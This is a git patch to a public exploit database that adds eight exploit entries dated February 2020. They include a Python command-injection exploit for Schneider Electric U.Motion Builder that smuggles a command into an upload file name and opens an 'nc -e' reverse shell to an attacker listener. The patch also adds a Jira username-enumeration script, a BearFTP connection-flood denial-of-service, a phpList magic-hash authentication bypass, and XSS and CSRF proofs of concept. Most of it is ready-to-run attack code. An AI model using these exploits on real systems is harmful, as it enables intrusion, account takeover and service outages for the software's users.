From 8683ee3eea6329c20966fefcc0fe1fa9e8f7a3d8 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Tue, 4 Feb 2020 05:02:00 +0000 Subject: [PATCH] DB: 2020-02-04 8 changes to exploits/shellcodes BearFTP 0.1.0 - 'PASV' Denial of Service P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC) Jobberbase 2.0 CMS - 'jobs-in' SQL Injection IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting phpList 3.5.0 - Authentication Bypass Jira 8.3.4 - Information Disclosure (Username Enumeration) Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection School ERP System 1.0 - Cross Site Request Forgery (Add Admin) --- exploits/hardware/webapps/47991.py | 226 +++++++++++++++ exploits/ios/dos/47993.py | 29 ++ exploits/java/webapps/47990.py | 88 ++++++ exploits/linux/dos/47987.cs | 43 +++ exploits/php/webapps/47311.txt | 2 +- exploits/php/webapps/47988.txt | 34 +++ exploits/php/webapps/47989.php | 90 ++++++ exploits/php/webapps/47992.txt | 429 +++++++++++++++++++++++++++++ files_exploits.csv | 9 +- 9 files changed, 948 insertions(+), 2 deletions(-) create mode 100755 exploits/hardware/webapps/47991.py create mode 100755 exploits/ios/dos/47993.py create mode 100755 exploits/java/webapps/47990.py create mode 100644 exploits/linux/dos/47987.cs create mode 100644 exploits/php/webapps/47988.txt create mode 100644 exploits/php/webapps/47989.php create mode 100644 exploits/php/webapps/47992.txt diff --git a/exploits/hardware/webapps/47991.py b/exploits/hardware/webapps/47991.py new file mode 100755 index 000000000..443299dc4 --- /dev/null +++ b/exploits/hardware/webapps/47991.py @@ -0,0 +1,226 @@ +# Exploit Title: Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection +# Date: 2018-08-01 +# Exploit Author: Cosmin Craciun +# Vendor Homepage: https://www.se.com +# Version: <= 1.3.4 +# Tested on: Delivered Virtual Appliance running on Windows 10 x64 +# CVE : CVE-2018-7777 +# References: https://github.com/cosmin91ro + +#!/usr/bin/oython + + +from __future__ import print_function +import httplib +import urllib +import argparse +import re +import sys +import socket +import threading +import time + +parser = argparse.ArgumentParser(description='PoC') +parser.add_argument('--target', help='IP or hostname of target', required=True) +parser.add_argument('--port', help='TCP port the target app is running', required=True, default='8080') +parser.add_argument('--username', help='TCP port the target app is running', required=True, default='admin') +parser.add_argument('--password', help='TCP port the target app is running', required=True, default='admin') +parser.add_argument('--command', help='malicious command to run', default='shell') +parser.add_argument('--src_ip', help='IP of listener for the reverse shell', required=True) +parser.add_argument('--timeout', help='time in seconds to wait for a response', type=int, default=3) + +class Exploiter(threading.Thread): + def __init__ (self, target, port, timeout, uri, body, headers, shell_mode): + threading.Thread.__init__(self) + self.target = target + self.port = port + self.timeout = timeout + self.uri = uri + self.body = body + self.headers = headers + self.shell_mode = shell_mode + + def send_exploit(self, target, port, timeout, uri, body, headers): + print('Sending exploit ...') + conn = httplib.HTTPConnection("{0}:{1}".format(target, port), timeout=timeout) + conn.request("POST", uri, body, headers) + print("Exploit sent") + if not self.shell_mode: print("Getting response ...") + + try: + response = conn.getresponse() + if not self.shell_mode: print(str(response.status) + " " + response.reason) + data = response.read() + if not self.shell_mode: print('Response: {0}\r\nCheck the exploit result'.format(data)) + + except socket.timeout: + if not self.shell_mode: print("Connection timeout while waiting response from the target.\r\nCheck the exploit result") + + def run(self): + self.send_exploit(self.target, self.port, self.timeout, self.uri, self.body, self.headers) + +class Listener(threading.Thread): + def __init__(self, src_ip): + threading.Thread.__init__(self) + self.src_ip = src_ip + + def run(self): + self.listen(self.src_ip) + + def listen(self, src_ip): + TCP_IP = src_ip + TCP_PORT = 4444 + BUFFER_SIZE = 1024 + + try: + s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + s.bind((TCP_IP, TCP_PORT)) + print("Listener open on port {0}".format(TCP_PORT)) + s.listen(1) + + conn, addr = s.accept() + print('Exploited: ' + str(addr)) + + while 1: + comm = raw_input("shell$ ").strip() + if comm == "quit": + conn.close() + sys.exit(0) + + if comm != "": + conn.send(comm + " 2>&1" + "\x0a") + while 1: + data = conn.recv(BUFFER_SIZE) + if not data: break + print(data, end="") + if "\x0a" in data: break + + except Exception as ex: + print("Could not start listener") + print(ex) + +def login(target, port, username, password): + uri = "http://{0}:{1}/umotion/modules/system/user_login.php".format(target, port) + + params = urllib.urlencode({ + 'username': username, + 'password': password, + 'rememberMe': '1', + 'context': 'configuration', + 'op': 'login' + }) + + headers = { + "Content-type": "application/x-www-form-urlencoded; charset=UTF-8", + "Accept": "*/*" + } + + try: + conn = httplib.HTTPConnection("{0}:{1}".format(target, port)) + conn.request("POST", uri, params, headers) + response = conn.getresponse() + print(str(response.status) + " " + response.reason) + data = response.read() + except socket.timeout: + print("Connection timeout while logging in. Check if the server is available") + return + + + cookie = response.getheader("Set-Cookie") + #print(cookie) + + r = re.match(r'PHPSESSID=(.{26});.*loginSeed=(.{32})', cookie) + if r is None: + print("Regex not match, could not get cookies") + return + + if len(r.groups()) < 2: + print("Error while getting cookies") + return + + sessid = r.groups()[0] + login_seed = r.groups()[1] + + return sessid, login_seed + + conn.close() + + +def encode_multipart_formdata(fields, files): + LIMIT = '----------lImIt_of_THE_fIle_eW_$' + CRLF = '\r\n' + L = [] + for (key, value) in fields: + L.append('--' + LIMIT) + L.append('Content-Disposition: form-data; name="%s"' % key) + L.append('') + L.append(value) + for (key, filename, value) in files: + L.append('--' + LIMIT) + L.append('Content-Disposition: form-data; name="%s"; filename="%s"' % (key, filename)) + L.append('Content-Type: application/x-gzip') + L.append('') + L.append(value) + L.append('--' + LIMIT + '--') + L.append('') + body = CRLF.join(L) + content_type = 'multipart/form-data; boundary=%s' % LIMIT + return content_type, body + + +def exploit(target, port, username, password, command, timeout): + uri = "http://{0}:{1}/umotion/modules/system/update_module.php".format(target, port) + + fields = [ + ('choose_update_mode', 'MANUAL'), + ('add_button', '0'), + ('format', 'json'), + ('step', '2'), + ('next', '1'), + ('name_update_file', ''), + ('path_update_file', ''), + ('type_update_file', '') + ] + + listener = None + if command == "shell": + shell_mode = True + command = "nc -e $SHELL {0} 4444".format(args.src_ip) + listener = Listener(args.src_ip) + listener.start() + time.sleep(3) + else: + shell_mode = False + + files = [ + ('update_file', 'my;{0};file.tar.gz'.format(command), "\x1f\x8b") + ] + + content_type, body = encode_multipart_formdata(fields, files) + + if not shell_mode or (shell_mode and listener and listener.isAlive()): + print('Logging in ...') + sess_id, login_seed = login(target, port, username, password) + if sess_id is None or login_seed is None: + print('Error while logging in') + return + + print('Logged in ! ') + + headers = { + 'Accept': 'application/json,text/javascript,*/*; q=0.01', + 'Accept-Encoding': 'gzip,deflate', + 'Referer': 'http://{0}:{1}/umotion/modules/system/externalframe.php?context=configuration'.format(target, port), + 'X-Requested-With': 'XMLHttpRequest', + 'Content-Length': len(body), + 'Content-Type': content_type, + 'Connection': 'keep-alive', + 'Cookie': 'PHPSESSID={0}; loginSeed={1}'.format(sess_id, login_seed) + } + + exploiter = Exploiter(target, port, timeout, uri, body, headers, shell_mode) + exploiter.start() + +if __name__ == '__main__': + args = parser.parse_args() + exploit(args.target, args.port, args.username, args.password, args.command, args.timeout) \ No newline at end of file diff --git a/exploits/ios/dos/47993.py b/exploits/ios/dos/47993.py new file mode 100755 index 000000000..586005dbc --- /dev/null +++ b/exploits/ios/dos/47993.py @@ -0,0 +1,29 @@ +# Exploit Title: P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC) +# Discovery by: Ivan Marmolejo +# Discovery Date: 2020-02-02 +# Vendor Homepage: https://apps.apple.com/mx/app/p2pwificam2/id663665207 +# Software Link: App Store for iOS devices +# Tested Version: 10.4.1 +# Vulnerability Type: Denial of Service (DoS) Local +# Tested on OS: iPhone 6s iOS 13.3 + +# Summary: P2PWIFICAM is a matching network camera P2P (point to point) monitoring software. +# Adopt the advanced P2P technology, can make the camera in the intranet from port mapping complex, +# truly plug and play! + +# Steps to Produce the Crash: + +# 1.- Run python code: P2PWIFICAM.py +# 2.- Copy content to clipboard +# 3.- Open "P2PWIFICAM" for Ios +# 4.- Go to "Add" (Touch here to add a camera) +# 5.- Go to "Input Camera" +# 6.- Paste Clipboard on "Camera ID" +# 7.- Paste Clipboard on "Password" +# 9.- Ok +# 10- Crashed + +#!/usr/bin/env python + +buffer = "\x41" * 257 +print (buffer) \ No newline at end of file diff --git a/exploits/java/webapps/47990.py b/exploits/java/webapps/47990.py new file mode 100755 index 000000000..5c4ecc06c --- /dev/null +++ b/exploits/java/webapps/47990.py @@ -0,0 +1,88 @@ +# Exploit Title: Jira 8.3.4 - Information Disclosure (Username Enumeration) +# Date: 2019-09-11 +# Exploit Author: Mufeed VH +# Vendor Homepage: https://www.atlassian.com/ +# Software Link: https://www.atlassian.com/software/jira +# Version: 8.3.4 +# Tested on: Pop!_OS 19.10 +# CVE : CVE-2019-8449 + +# CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 +# DETAILS :: https://www.cvedetails.com/cve/CVE-2019-8449/ +# CONFIRM :: https://jira.atlassian.com/browse/JRASERVER-69796 + +#!/usr/bin/env python + + +__author__ = "Mufeed VH (@mufeedvh)" + +import os +import requests + + +class CVE_2019_8449: + def ask_for_domain(self): + domain = raw_input("[>] Enter the domain of Jira instance: => ") + if domain == "": + print("\n[-] ERROR: domain is required\n") + self.ask_for_domain() + self.url = "https://{}/rest/api/latest/groupuserpicker".format(domain) + + def ask_for_query(self): + self.query = raw_input("[>] Enter search query: [required] (Example: admin) => ") + if self.query == "": + print("\n[-] ERROR: The query parameter is required\n") + self.ask_for_query() + + def exploit(self): + self.ask_for_domain() + self.ask_for_query() + + maxResults = raw_input("\n[>] Enter the number of maximum results to fetch: (50) => ") + showAvatar = raw_input("\n[>] Enter 'true' or 'false' whether to show Avatar of the user or not: (false) => ") + fieldId = raw_input("\n[>] Enter the fieldId to fetch: => ") + projectId = raw_input("\n[>] Enter the projectId to fetch: => ") + issueTypeId = raw_input("\n[>] Enter the issueTypeId to fetch: => ") + avatarSize = raw_input("\n[>] Enter the size of Avatar to fetch: (xsmall) => ") + caseInsensitive = raw_input("\n[>] Enter 'true' or 'false' whether to show results case insensitive or not: (false) => ") + excludeConnectAddons = raw_input("\n[>] Indicates whether Connect app users and groups should be excluded from the search results. If an invalid value is provided, the default value is used: (false) => ") + + params = { + 'query': self.query, + 'maxResults': maxResults, + 'showAvatar': showAvatar, + 'fieldId': fieldId, + 'projectId': projectId, + 'issueTypeId': issueTypeId, + 'avatarSize': avatarSize, + 'caseInsensitive': caseInsensitive, + 'excludeConnectAddons': excludeConnectAddons + } + + send_it = requests.get(url = self.url, params = params) + + try: + response = send_it.json() + except: + print("\n[-] ERROR: Something went wrong, the request didn't respond with a JSON result.") + print("[-] INFO: It is likely that the domain you've entered is wrong or this Jira instance is not exploitable.") + print("[-] INFO: Try visting the target endpoint manually ({}) and confirm the endpoint is accessible.".format(self.url)) + quit() + + print("\n<========== RESPONSE ==========>\n") + print(response) + print("\n<==============================>\n") + +if __name__ == '__main__': + os.system('cls' if os.name == 'nt' else 'clear') + + print(''' + ================================================ + | | + | CVE-2019-8449 Exploit for Jira v2.1 - v8.3.4 | + | Proof of Concept By: Mufeed VH [@mufeedvh] | + | | + ================================================ + ''') + + CVE_2019_8449().exploit() \ No newline at end of file diff --git a/exploits/linux/dos/47987.cs b/exploits/linux/dos/47987.cs new file mode 100644 index 000000000..55f6c0e8d --- /dev/null +++ b/exploits/linux/dos/47987.cs @@ -0,0 +1,43 @@ +# Exploit Title: BearFTP 0.1.0 - 'PASV' Denial of Service +# Date: 2020-01-29 +# Exploit Author: kolya5544 +# Vendor Homepage: http://iktm.me/ +# Software Link: https://github.com/kolya5544/BearFTP/releases +# Version: v0.0.1 - v0.1.0 +# Tested on: Ubuntu 18.04 +# CVE : CVE-2020-8416 + +static void Main(string[] args) + { + Console.WriteLine("DoS started. Approx. time to complete: 204 seconds."); + for (int i = 0; i < 1024*8; i++) // We will do 8000+ connections. Usually server only spawns half of them. + { + new Thread(() => + { + Thread.CurrentThread.IsBackground = true; + + TcpClient exploit = new TcpClient("HOSTNAME", PASV_PORT); //Replace with actual data to test it. + var ns = exploit.GetStream(); + StreamWriter sw = new StreamWriter(ns); + sw.AutoFlush = true; + StreamReader sr = new StreamReader(ns); + + + while (true) + { + Thread.Sleep(5000); //We just spend our time. + } + }).Start(); + Thread.Sleep(25); //Spawn a new connection every 25ms so we don't kill our own connection. + } + while (true) + { + Console.WriteLine("DoS attack completed!"); + Thread.Sleep(20000); + } + } +/* +BEFORE PATCH APPLIED (after ~100 seconds of attacking): +3700 threads spawned, VIRT went from 3388M to 32.1G, RES from 60000 to 129M. CPU usage ~10%. The server struggles to process commands. Recovers in several minutes after the attack is stopped +AFTER PATCH APPLIED: +10 threads spawned at most, VIRT didnt change, RES didnt change. CPU usage ~3%. Works fine. */ \ No newline at end of file diff --git a/exploits/php/webapps/47311.txt b/exploits/php/webapps/47311.txt index 6690f0550..960f1d6cd 100644 --- a/exploits/php/webapps/47311.txt +++ b/exploits/php/webapps/47311.txt @@ -1,7 +1,7 @@ # Exploit Title: Jobberbase 2.0 CMS - 'jobs-in' SQL Injection # Google Dork: N/A # Date: 28, August 2019 -# Exploit Author: Naren Jangra +# Exploit Author: Suvadip Kar # Vendor Homepage: http://jobberbase.com/ # Software Link: https://github.com/filipcte/jobberbase/zipball/master # Version: 2.0 diff --git a/exploits/php/webapps/47988.txt b/exploits/php/webapps/47988.txt new file mode 100644 index 000000000..578612926 --- /dev/null +++ b/exploits/php/webapps/47988.txt @@ -0,0 +1,34 @@ +# Title: IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting +# Date: 2020-01-27 +# Author: Lutfu Mert Ceylan +# Vendor Homepage: www.icewarp.com +# Tested on: Windows 10 +# Versions: 11.4.4.1 and before +# Vulnerable Parameter: "color" (Get Method) +# Google Dork: inurl:/webmail/ intext:Powered by IceWarp Server +# CVE: CVE-2020-8512 + +# Notes: + +# An attacker can use XSS (in color parameter IceWarp WebMail 11.4.4.1 and +# before)to send a malicious script to an unsuspecting Admins or users. The +# end admins or useras browser has no way to know that the script should not +# be trusted, and will execute the script. Because it thinks the script came +# from a trusted source, the malicious script can access any cookies, session +# tokens, or other sensitive information retained by the browser and used +# with that site. These scripts can even rewrite the content of the HTML +# page. Even an attacker can easily place users in social engineering through +# this vulnerability and create a fake field. + +# PoC: + +# Go to Sign-in page through this path: http://localhost/webmail/ or +http://localhost:32000/webmail/ + +# Add the "color" parameter to the URL and write malicious code, Example: +http://localhost/webmail/?color="> + +# When the user goes to the URL, the malicious code is executed + +Example Vulnerable URL: http://localhost/webmail/?color= +"> \ No newline at end of file diff --git a/exploits/php/webapps/47989.php b/exploits/php/webapps/47989.php new file mode 100644 index 000000000..50964ec40 --- /dev/null +++ b/exploits/php/webapps/47989.php @@ -0,0 +1,90 @@ +# Exploit Title: phpList 3.5.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-02-03 +# Exploit Author: Suvadip Kar +# Author Contact: https://twitter.com/spidersec +# Vendor Homepage: https://www.phplist.org +# Software Link: https://www.phplist.org/download-phplist/ +# Version: 3.5.0 +# Tested on: Linux +# CVE : N/A + +Background of the Vulnerability : + +Php loose comparison '==' compares two operands by converting them to integers even if they are strings. + +EXAMPLE CODE: + + + +OUTPUT: + +bool(true) +bool(true) + +Vulnerable code: + +GITHUB: https://github.com/phpList/phplist3/blob/master/public_html/lists/admin/phpListAdminAuthentication.php +----- +if(empty($login)||($password=="")){ + return array(0, s('Please enter your credentials.')); +} +if ($admindata['disabled']) { + return array(0, s('your account has been disabled')); +} +if (//Password validation. + !empty($passwordDB) && $encryptedPass == $passwordDB // Vulnerable because loose comparison is used +) + return array($admindata['id'], 'OK'); + else { + if (!empty($GLOBALS['admin_auth_module'])) { + Error(s('Admin authentication has changed, please update your admin module'), + 'https://resources.phplist.com/documentation/errors/adminauthchange'); + return; + } +return array(0, s('incorrect password')); + +} +------- + +Steps to reproduce: + + 1. Set the string 'TyNOQHUS' as password for username 'admin'. Its sha256 value is 0e66298694359207596086558843543959518835691168370379069085300385. + + 2. Now navigate to endpoint '/admin' and try to login with username 'admin' password 'TyNOQHUS'. + + 3. User Logged in with valid password. + + 4. Now logout from the application and try to login with username 'admin' password '34250003024812'. + + 5. User Logged in, without valid password. + + 6. Authentication bypassed because of PHP loose comparison. + + FIX: This vulnerability can be fixed by using strict comparison (===) in place of loose comparison. + ----- + if(empty($login)||($password=="")){ + return array(0, s('Please enter your credentials.')); + } + if ($admindata['disabled']) { + return array(0, s('your account has been disabled')); + } + if (//Password validation. + !empty($passwordDB) && $encryptedPass === $passwordDB // Fixed by using strict comparison '==='. + ) + return array($admindata['id'], 'OK'); + else { + if (!empty($GLOBALS['admin_auth_module'])) { + Error(s('Admin authentication has changed, please update your admin module'), + 'https://resources.phplist.com/documentation/errors/adminauthchange'); + return; + } + return array(0, s('incorrect password')); + + } + ------- + +Additional Resource: https://www.owasp.org/images/6/6b/PHPMagicTricks-TypeJuggling.pdf \ No newline at end of file diff --git a/exploits/php/webapps/47992.txt b/exploits/php/webapps/47992.txt new file mode 100644 index 000000000..280e38efd --- /dev/null +++ b/exploits/php/webapps/47992.txt @@ -0,0 +1,429 @@ +# Title: School ERP System 1.0 - Cross Site Request Forgery (Add Admin) +# Date: 2020-01-31 +# Exploit Author: J3rryBl4nks +# Vendor Homepage: https://sourceforge.net/projects/school-erp-ultimate/files/ +# Software Link: https://sourceforge.net/projects/school-erp-ultimate/files/ +# Version ERP-Ultimate +# Tested on Windows 10/Kali Rolling +# The School ERP Ultimate web application is vulnerable to Cross Site Request Forgery +# that leads to admin account creation and arbitrary user deletion. +# Proof of Concept for the Admin Account Creation: + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +Proof of Concept for the arbitrary user deletion: + + + +
+ + + + +
+ + \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index b35682ef9..b5a7de656 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -6664,6 +6664,8 @@ id,file,description,date,author,type,platform,port 47955,exploits/windows/dos/47955.py,"BOOTP Turbo 2.0 - Denial of Service (SEH)(PoC)",2020-01-23,boku,dos,windows, 47964,exploits/windows/dos/47964.cpp,"Remote Desktop Gateway - 'BlueGate' Denial of Service (PoC)",2020-01-23,ollypwn,dos,windows, 47970,exploits/multiple/dos/47970.txt,"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image",2020-01-28,"Google Security Research",dos,multiple, +47987,exploits/linux/dos/47987.cs,"BearFTP 0.1.0 - 'PASV' Denial of Service",2020-02-03,kolya5544,dos,linux, +47993,exploits/ios/dos/47993.py,"P2PWIFICAM2 for iOS 10.4.1 - 'Camera ID' Denial of Service (PoC)",2020-02-03,"Ivan Marmolejo",dos,ios, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -41981,7 +41983,7 @@ id,file,description,date,author,type,platform,port 47305,exploits/php/webapps/47305.py,"openITCOCKPIT 3.6.1-2 - Cross-Site Request Forgery",2019-08-26,"Julian Rittweger",webapps,php,80 47308,exploits/multiple/webapps/47308.py,"Tableau - XML External Entity",2019-08-27,"Jarad Kopf",webapps,multiple, 47310,exploits/php/webapps/47310.txt,"SQLiteManager 1.2.0 / 1.2.4 - Blind SQL Injection",2019-08-28,"Rafael Pedrero",webapps,php,80 -47311,exploits/php/webapps/47311.txt,"Jobberbase 2.0 CMS - 'jobs-in' SQL Injection",2019-08-28,"Naren Jangra",webapps,php,80 +47311,exploits/php/webapps/47311.txt,"Jobberbase 2.0 CMS - 'jobs-in' SQL Injection",2019-08-28,"Suvadip Kar",webapps,php,80 47312,exploits/php/webapps/47312.html,"WordPress Plugin GoURL.io < 1.4.14 - File Upload",2018-10-31,"Pouya Darabi",webapps,php, 47314,exploits/php/webapps/47314.sh,"Jobberbase 2.0 - 'subscribe' SQL Injection",2019-08-29,"Damian Ebelties",webapps,php,80 47315,exploits/php/webapps/47315.txt,"PilusCart 1.4.1 - Local File Disclosure",2019-08-29,"Damian Ebelties",webapps,php,80 @@ -42282,3 +42284,8 @@ id,file,description,date,author,type,platform,port 47982,exploits/php/webapps/47982.py,"rConfig 3.9.3 - Authenticated Remote Code Execution",2020-01-30,vikingfr,webapps,php, 47985,exploits/php/webapps/47985.txt,"Lotus Core CMS 1.0.1 - Local File Inclusion",2020-01-31,"Daniel Monzón",webapps,php, 47986,exploits/php/webapps/47986.txt,"FlexNet Publisher 11.12.1 - Cross-Site Request Forgery (Add Local Admin)",2020-01-31,"Ismail Tasdelen",webapps,php, +47988,exploits/php/webapps/47988.txt,"IceWarp WebMail 11.4.4.1 - Reflective Cross-Site Scripting",2020-02-03,"Lutfu Mert Ceylan",webapps,php, +47989,exploits/php/webapps/47989.php,"phpList 3.5.0 - Authentication Bypass",2020-02-03,"Suvadip Kar",webapps,php, +47990,exploits/java/webapps/47990.py,"Jira 8.3.4 - Information Disclosure (Username Enumeration)",2020-02-03,"Mufeed VH",webapps,java, +47991,exploits/hardware/webapps/47991.py,"Schneider Electric U.Motion Builder 1.3.4 - Authenticated Command Injection",2020-02-03,"Cosmin Craciun",webapps,hardware, +47992,exploits/php/webapps/47992.txt,"School ERP System 1.0 - Cross Site Request Forgery (Add Admin)",2020-02-03,J3rryBl4nks,webapps,php,